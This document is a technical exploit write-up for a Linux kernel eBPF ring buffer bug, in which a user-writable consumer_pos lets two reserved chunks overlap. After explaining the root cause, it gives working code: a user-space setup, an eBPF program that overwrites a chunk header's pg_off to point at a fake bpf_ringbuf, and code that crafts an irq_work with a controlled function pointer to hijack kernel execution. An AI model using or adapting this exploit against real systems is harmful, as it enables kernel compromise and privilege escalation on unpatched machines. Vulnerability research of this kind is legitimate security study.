# Background
Taken from [commit message](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=cfa1a2329a691ffd991fcf7248a57d752e712881):

> The BPF ring buffer internally is implemented as a power-of-2 sized circular buffer, with two logical and ever-increasing counters: consumer_pos is the consumer counter to show which logical position the consumer consumed the data, and producer_pos which is the producer counter denoting the amount of data reserved by all producers.<br><br>
Each time a record is reserved, the producer that "owns" the record will successfully advance producer counter. In user space each time a record is read, the consumer of the data advanced the consumer counter once it finished processing. Both counters are stored in separate pages so that from user space, the producer counter is __read-only__ and the consumer counter is __read-write__.

This is the structure layout of `bpf_ringbuf`:
```C
struct bpf_ringbuf {
	wait_queue_head_t waitq;
	struct irq_work work;
	u64 mask;
	struct page **pages;
	int nr_pages;
	spinlock_t spinlock ____cacheline_aligned_in_smp;
	atomic_t busy ____cacheline_aligned_in_smp;
	unsigned long consumer_pos __aligned(PAGE_SIZE); // read-write from user space
	unsigned long producer_pos __aligned(PAGE_SIZE); // read-only from user space
	unsigned long pending_pos;
	char data[] __aligned(PAGE_SIZE);
};
```

`BPF_FUNC_ringbuf_reserve` is used to allocate a memory chunk from a `BPF_MAP_TYPE_RINGBUF` map. It reserves 8 bytes of space for the record header structure.
```C
/* 8-byte ring buffer record header structure */
struct bpf_ringbuf_hdr {
	u32 len;
	u32 pg_off;
};
```
It then returns `(void *)hdr + BPF_RINGBUF_HDR_SZ` for the eBPF program to use. The eBPF program is unable to modify `bpf_ringbuf_hdr` because it lies outside of the returned memory chunk.
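
For reference, this is roughly how the API is meant to be used from an eBPF program; the map name, section, and payload below are illustrative only, not part of the exploit:
```C
// Minimal, well-behaved ringbuf usage sketch (illustrative names and sizes).
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

char LICENSE[] SEC("license") = "GPL";

struct {
	__uint(type, BPF_MAP_TYPE_RINGBUF);
	__uint(max_entries, 0x4000);
} rb SEC(".maps");

SEC("tracepoint/syscalls/sys_enter_getuid")
int normal_use(void *ctx)
{
	/* returns a pointer just past the 8-byte bpf_ringbuf_hdr */
	__u64 *chunk = bpf_ringbuf_reserve(&rb, sizeof(__u64), 0);

	if (!chunk)
		return 0;
	*chunk = bpf_get_current_pid_tgid();
	bpf_ringbuf_submit(chunk, 0);
	return 0;
}
```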

But with a corrupted `rb->consumer_pos`, it's possible to make the second allocated memory chunk overlap with the first chunk.
As a result, the eBPF program is able to edit the first chunk's hdr. This is how we do it:

1. First, we create a `BPF_MAP_TYPE_RINGBUF` map of size 0x4000 and modify `consumer_pos` to 0x3000 before calling `BPF_FUNC_ringbuf_reserve` (see the user-space sketch after this list).
2. Allocate chunk A; it will occupy `[0x0,0x3008]`, and the eBPF program is able to edit `[0x8,0x3008]`.
3. Now allocate chunk B with size 0x3000; it will succeed because we advanced `consumer_pos` ahead of time to pass the check.
4. Chunk B will occupy `[0x3008,0x6010]`, and the eBPF program is able to edit `[0x3010,0x6010]`.
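
A minimal user-space sketch of step 1, using raw `bpf(2)`/`mmap(2)` syscalls (no libbpf, no error handling, 4 KiB pages assumed); this is not the exploit's exact code, just the idea:
```C
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <linux/bpf.h>

int main(void)
{
	union bpf_attr attr;

	memset(&attr, 0, sizeof(attr));
	attr.map_type    = BPF_MAP_TYPE_RINGBUF;
	attr.max_entries = 0x4000;              /* ring size: power of two, page aligned */
	int rb_fd = syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));

	/* Page 0 of the mapping is rb->consumer_pos and is writable from user space. */
	unsigned long *consumer = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
				       MAP_SHARED, rb_fd, 0);

	/* Advance the consumer counter so the second, overlapping reservation
	 * passes the size check in __bpf_ringbuf_reserve(). */
	*consumer = 0x3000;

	/* ... now load and trigger the eBPF program that reserves chunk A and B ... */
	return 0;
}
```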

On the kernel side, this is how the check is done:
```C
static void *__bpf_ringbuf_reserve(struct bpf_ringbuf *rb, u64 size)
{
	...
	len = round_up(size + BPF_RINGBUF_HDR_SZ, 8);
	...
	cons_pos = smp_load_acquire(&rb->consumer_pos); /* value is under user-space control */
	...
	prod_pos = rb->producer_pos;
	new_prod_pos = prod_pos + len;

	/* check for out of ringbuf space by ensuring producer position
	 * doesn't advance more than (ringbuf_size - 1) ahead
	 */
	if (new_prod_pos - cons_pos > rb->mask) {
		// failed path
		spin_unlock_irqrestore(&rb->spinlock, flags);
		return NULL;
	}
	// success path
}
```
It passes the check because `cons_pos` is 0x3000 (edited via user space) and `new_prod_pos` is 0x6010, so `new_prod_pos - cons_pos = 0x3010`, which does not exceed `rb->mask` (0x4000 - 1 = 0x3fff). The reserve therefore succeeds and returns a buffer at `[0x3008,0x6010]` to the eBPF program.
This matters because the ringbuf memory is allocated in the following way:
```C
static struct bpf_ringbuf *bpf_ringbuf_area_alloc(size_t data_sz, int numa_node)
{
	int nr_meta_pages = RINGBUF_NR_META_PAGES;
	int nr_data_pages = data_sz >> PAGE_SHIFT;
	int nr_pages = nr_meta_pages + nr_data_pages;
	...
	/* Each data page is mapped twice to allow "virtual"
	 * continuous read of samples wrapping around the end of ring
	 * buffer area:
	 * ------------------------------------------------------
	 * | meta pages |  real data pages  |  same data pages  |
	 * ------------------------------------------------------
	 * |            | 1 2 3 4 5 6 7 8 9 | 1 2 3 4 5 6 7 8 9 |
	 * ------------------------------------------------------
	 * |            | TA             DA | TA             DA |
	 * ------------------------------------------------------
	 *                               ^^^^^^^
	 *                                  |
	 * Here, no need to worry about special handling of wrapped-around
	 * data due to double-mapped data pages. This works both in kernel and
	 * when mmap()'ed in user-space, simplifying both kernel and
	 * user-space implementations significantly.
	 */
	array_size = (nr_meta_pages + 2 * nr_data_pages) * sizeof(*pages);
	pages = bpf_map_area_alloc(array_size, numa_node);
	if (!pages)
		return NULL;

	for (i = 0; i < nr_pages; i++) {
		page = alloc_pages_node(numa_node, flags, 0);
		if (!page) {
			nr_pages = i;
			goto err_free_pages;
		}
		pages[i] = page;
		if (i >= nr_meta_pages)
			pages[nr_data_pages + i] = page;
	}

	rb = vmap(pages, nr_meta_pages + 2 * nr_data_pages,
		  VM_MAP | VM_USERMAP, PAGE_KERNEL);
	...
}
```

`[0x0,0x4000]` and `[0x4000,0x8000]` point to the same data pages. This means that writing to `[0x4000,0x4008]` through chunk B actually writes to chunk A's hdr.
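
To make this concrete, here is a hypothetical eBPF program (not the exploit's verbatim code; map name, section and trigger are illustrative) that performs both reservations and rewrites chunk A's `pg_off` through the aliased mapping. It assumes user space has already set `consumer_pos` to 0x3000 and prepared the fake object described in the next section, since submitting chunk A is what fires it:
```C
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

char LICENSE[] SEC("license") = "GPL";

struct {
	__uint(type, BPF_MAP_TYPE_RINGBUF);
	__uint(max_entries, 0x4000);
} rb SEC(".maps");

SEC("tracepoint/syscalls/sys_enter_getuid")
int overlap(void *ctx)
{
	/* chunk A: hdr at ring offset 0x0, data at [0x8, 0x3008) */
	void *a = bpf_ringbuf_reserve(&rb, 0x3000 - 8, 0);
	if (!a)
		return 0;

	/* chunk B: hdr at 0x3008, data at [0x3010, 0x6010) -- only succeeds because
	 * user space already bumped consumer_pos to 0x3000 */
	void *b = bpf_ringbuf_reserve(&rb, 0x3000 - 8, 0);
	if (!b) {
		bpf_ringbuf_discard(a, 0);
		return 0;
	}

	/* Ring offset 0x4000 aliases offset 0x0, i.e. chunk A's header. Relative to
	 * chunk B's data (ring offset 0x3010) the header sits at 0xff0; pg_off is
	 * its second u32. Point chunk A's "ring buffer" at the consumer page. */
	*(__u32 *)((char *)b + 0xff0 + 4) = 2;

	bpf_ringbuf_discard(b, BPF_RB_NO_WAKEUP);

	/* Committing chunk A now resolves the fake bpf_ringbuf in the consumer page;
	 * BPF_RB_FORCE_WAKEUP queues the attacker-controlled irq_work (see below). */
	bpf_ringbuf_submit(a, BPF_RB_FORCE_WAKEUP);
	return 0;
}
```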

# Exploit
`BPF_FUNC_ringbuf_submit`/`BPF_FUNC_ringbuf_discard` use the hdr's `pg_off` to locate the ring buffer's meta pages (and thus the `bpf_ringbuf` object itself).

```C
static struct bpf_ringbuf *bpf_ringbuf_restore_from_rec(struct bpf_ringbuf_hdr *hdr)
{
	unsigned long addr = (unsigned long)(void *)hdr;
	unsigned long off = (unsigned long)hdr->pg_off << PAGE_SHIFT;

	return (void*)((addr & PAGE_MASK) - off);
}

static void bpf_ringbuf_commit(void *sample, u64 flags, bool discard)
{
	unsigned long rec_pos, cons_pos;
	struct bpf_ringbuf_hdr *hdr;
	struct bpf_ringbuf *rb;
	u32 new_len;

	hdr = sample - BPF_RINGBUF_HDR_SZ;
	rb = bpf_ringbuf_restore_from_rec(hdr);
	...
```
`pg_off` in `bpf_ringbuf_hdr` is the chunk's page offset from the `bpf_ringbuf` structure, so `bpf_ringbuf_restore_from_rec` subtracts `pg_off` pages from the chunk's address to locate the `bpf_ringbuf` object. If we look at this structure again:
```C
struct bpf_ringbuf {
	...
	unsigned long consumer_pos __aligned(PAGE_SIZE); // read-write from user space
	unsigned long producer_pos __aligned(PAGE_SIZE); // read-only from user space
	unsigned long pending_pos;
	char data[] __aligned(PAGE_SIZE);
};
```
Suppose chunk A is located in the first page of `rb->data`; its real `pg_off` is 3, since the data area starts three pages after the `bpf_ringbuf` object (one page of metadata, one for `consumer_pos`, one for `producer_pos`/`pending_pos`). Using the bug's primitive we overwrite chunk A's `pg_off` with 2, so the object address computed by `bpf_ringbuf_restore_from_rec` lands one page past the real object, exactly on `rb->consumer_pos`. Since we can mmap the `consumer_pos` page read-write, we fully control the contents of this fake `bpf_ringbuf`.
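
What we place in that page becomes the fake `bpf_ringbuf`. Below is a hedged user-space sketch of preparing it; the offsets (`work` at 0x18 inside `bpf_ringbuf`, `node.a_flags` at 0x8 and `func` at 0x10 inside `irq_work`) are assumptions for a typical x86_64 build without lock debugging, and `pivot_gadget` is just a placeholder for wherever the exploit redirects execution:
```C
#include <stdint.h>

/* Assumed offsets -- the real exploit derives them from the target kernel build. */
#define FAKE_RB_WORK_OFF    0x18  /* offsetof(struct bpf_ringbuf, work)      */
#define IRQ_WORK_FLAGS_OFF  0x08  /* offsetof(struct irq_work, node.a_flags) */
#define IRQ_WORK_FUNC_OFF   0x10  /* offsetof(struct irq_work, func)         */

static void craft_fake_ringbuf(uint8_t *consumer_page, uint64_t pivot_gadget)
{
	/* The first 8 bytes are still the real consumer_pos: keep the value that
	 * lets the overlapping reservation pass the size check. */
	*(uint64_t *)consumer_page = 0x3000;

	uint8_t *fake_work = consumer_page + FAKE_RB_WORK_OFF;

	/* Must look unclaimed so irq_work_queue() accepts it. */
	*(uint32_t *)(fake_work + IRQ_WORK_FLAGS_OFF) = 0;
	/* Later invoked as work->func(work) by the irq_work handler. */
	*(uint64_t *)(fake_work + IRQ_WORK_FUNC_OFF) = pivot_gadget;
}
```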

By crafting the `work` field inside this fake `bpf_ringbuf` and calling `bpf_ringbuf_commit` (via submit/discard) with `BPF_RB_FORCE_WAKEUP`, our crafted `irq_work` object is passed to `irq_work_queue`.
```C
static void bpf_ringbuf_commit(void *sample, u64 flags, bool discard)
{
	...
	if (flags & BPF_RB_FORCE_WAKEUP)
		irq_work_queue(&rb->work);
	...
```
The crafted `irq_work` will be processed by `irq_work_single`, which executes our controlled function pointer.
```C
void irq_work_single(void *arg)
{
	struct irq_work *work = arg;
	...
	work->func(work);	/* our controlled function pointer is invoked here */
	...
}
```
